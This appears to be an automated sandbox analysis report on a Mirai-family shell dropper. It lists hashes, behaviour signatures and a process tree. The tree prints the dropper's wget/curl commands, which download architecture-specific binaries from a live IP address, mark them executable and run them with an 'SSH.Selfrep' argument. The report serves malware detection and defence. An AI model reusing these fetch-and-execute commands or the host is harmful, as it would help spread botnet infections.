Analysis
-
max time kernel
150s -
max time network
147s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
07/03/2025, 12:37
Static task
static1
Behavioral task
behavioral1
Sample
0x83911d24Fx.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0x83911d24Fx.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
0x83911d24Fx.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0x83911d24Fx.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
0x83911d24Fx.sh
-
Size
2KB
-
MD5
6aea9de4b1853e6a5cea8ad020f48398
-
SHA1
20e44372765f05e6899aa9bd7e4d9ff64f59c2f7
-
SHA256
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f
-
SHA512
4cb78d553f9ae66e591534a047163ba9db0e54261266c700be091b4ddfe773de2e194f3b80916d40830d1d26f6a76912191fd01858922599fa2b88ca0c70d5a2
Malware Config
Extracted
mirai
DEMONS
Extracted
mirai
DEMONS
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 734 chmod 749 chmod 759 chmod 793 chmod 843 chmod 862 chmod 869 chmod 890 chmod 722 chmod 742 chmod 818 chmod 876 chmod 883 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/x 723 0x83911d24Fx.sh /tmp/x 735 0x83911d24Fx.sh /tmp/x 743 0x83911d24Fx.sh /tmp/x 750 0x83911d24Fx.sh /tmp/x 760 0x83911d24Fx.sh /tmp/x 794 0x83911d24Fx.sh /tmp/x 819 0x83911d24Fx.sh /tmp/x 844 0x83911d24Fx.sh /tmp/x 863 0x83911d24Fx.sh /tmp/x 870 0x83911d24Fx.sh /tmp/x 877 0x83911d24Fx.sh /tmp/x 884 0x83911d24Fx.sh /tmp/x 891 0x83911d24Fx.sh -
Modifies Watchdog functionality 1 TTPs 24 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x -
Enumerates active TCP sockets 1 TTPs 11 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x -
Writes file to system bin folder 12 IoCs
description ioc Process File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x -
Changes its process name 12 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself P^Dy[zzH\iGG]i^` 735 x Changes the process name, possibly in an attempt to hide itself bl`X}^PH`D\yKc 743 x Changes the process name, possibly in an attempt to hide itself Pgl^pfbPl]BH``MS 750 x Changes the process name, possibly in an attempt to hide itself c}B\pb[g~fDGkIfP 760 x Changes the process name, possibly in an attempt to hide itself \~DMkikP\}yf\i} 794 x Changes the process name, possibly in an attempt to hide itself Sy`GID~~b~}}}Gc 819 x Changes the process name, possibly in an attempt to hide itself \\B^pHrGbzbHI 844 x Changes the process name, possibly in an attempt to hide itself Bc\H}Kci\py\llG 863 x Changes the process name, possibly in an attempt to hide itself pIP}ikDflipp`bfi 870 x Changes the process name, possibly in an attempt to hide itself \ImbzP[Pr}`bkGM 877 x Changes the process name, possibly in an attempt to hide itself Pl\i\b\Pp}[^l 884 x Changes the process name, possibly in an attempt to hide itself g`XikM^`p^} 891 x -
Reads system network configuration 1 TTPs 11 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 726 wget 729 curl 733 cat -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uYtea.sh4 wget File opened for modification /tmp/uYtea.spc wget File opened for modification /tmp/uYtea.arc curl File opened for modification /tmp/uYtea.x86_64 wget File opened for modification /tmp/uYtea.arm wget File opened for modification /tmp/uYtea.arm curl File opened for modification /tmp/uYtea.ppc curl File opened for modification /tmp/uYtea.arm6 curl File opened for modification /tmp/uYtea.x86 wget File opened for modification /tmp/uYtea.x86 curl File opened for modification /tmp/uYtea.mips curl File opened for modification /tmp/uYtea.mpsl wget File opened for modification /tmp/uYtea.arm5 wget File opened for modification /tmp/uYtea.spc curl File opened for modification /tmp/uYtea.arc wget File opened for modification /tmp/x 0x83911d24Fx.sh File opened for modification /tmp/uYtea.arm5 curl File opened for modification /tmp/uYtea.arm7 wget File opened for modification /tmp/uYtea.arm7 curl File opened for modification /tmp/uYtea.ppc wget File opened for modification /tmp/uYtea.m68k wget File opened for modification /tmp/uYtea.sh4 curl File opened for modification /tmp/uYtea.x86_64 curl File opened for modification /tmp/uYtea.mips wget File opened for modification /tmp/uYtea.mpsl curl File opened for modification /tmp/uYtea.arm6 wget File opened for modification /tmp/uYtea.m68k curl
Processes
-
/tmp/0x83911d24Fx.sh/tmp/0x83911d24Fx.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:697 -
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.x862⤵
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/bin/catcat uYtea.x862⤵PID:721
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/x./x SSH.Selfrep2⤵PID:723
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:726
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/bin/catcat uYtea.mips2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.mips uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:735
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.mpsl2⤵
- Writes file to tmp directory
PID:737
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:743
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm2⤵
- Writes file to tmp directory
PID:746
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-f0d0d805b90f4ec4bb2092fe107c73cc-systemd-timedated.service-TeF4Xv uYtea.arm uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:750
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm52⤵
- Writes file to tmp directory
PID:756
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:760
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm62⤵
- Writes file to tmp directory
PID:783
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:794
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm72⤵
- Writes file to tmp directory
PID:812
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:819
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.ppc2⤵
- Writes file to tmp directory
PID:833
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:844
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.m68k2⤵
- Writes file to tmp directory
PID:858
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:863
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.sh42⤵
- Writes file to tmp directory
PID:865
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:870
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.spc2⤵
- Writes file to tmp directory
PID:873
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:877
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arc2⤵
- Writes file to tmp directory
PID:880
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:884
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.x86_642⤵
- Writes file to tmp directory
PID:886
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 uYtea.x86_64 x2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:891
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD5e8ee0839bb7869765d80e4280d585222
SHA1e0aa7ad73b70d2fbd0f8f4ca2d5ca417c6e36538
SHA25634537b3ae42d5d93060f42ccd019a8e976290a01b0380e6688a2dfa1515cd1a6
SHA512a3570f2617a4ed149c1a8a8a396a2d0522c09551ab54ef7c7b882c71b66ac3cd9246e552b6acaceeb2585c337bee9e471af729dee5a08f9a491ab14a6c72f02b
-
Filesize
75KB
MD5e22278172a0f989dcd639152d1f7bdda
SHA15ef82abd4a65994779ed81263e4495aa2a1fc0a0
SHA256c21056260e2db4b9f6dc025dfa6286ef2865b3b4f43a4633a7653499b63f20d3
SHA512686e0967c54a58d086e279d2b3d3aedbc604221b802c2fbf2ec4d55acc681eefcbf1edd236828c257350d5f75694d0dd4a98d35c8e7fa247ebe1dc4bc211e74e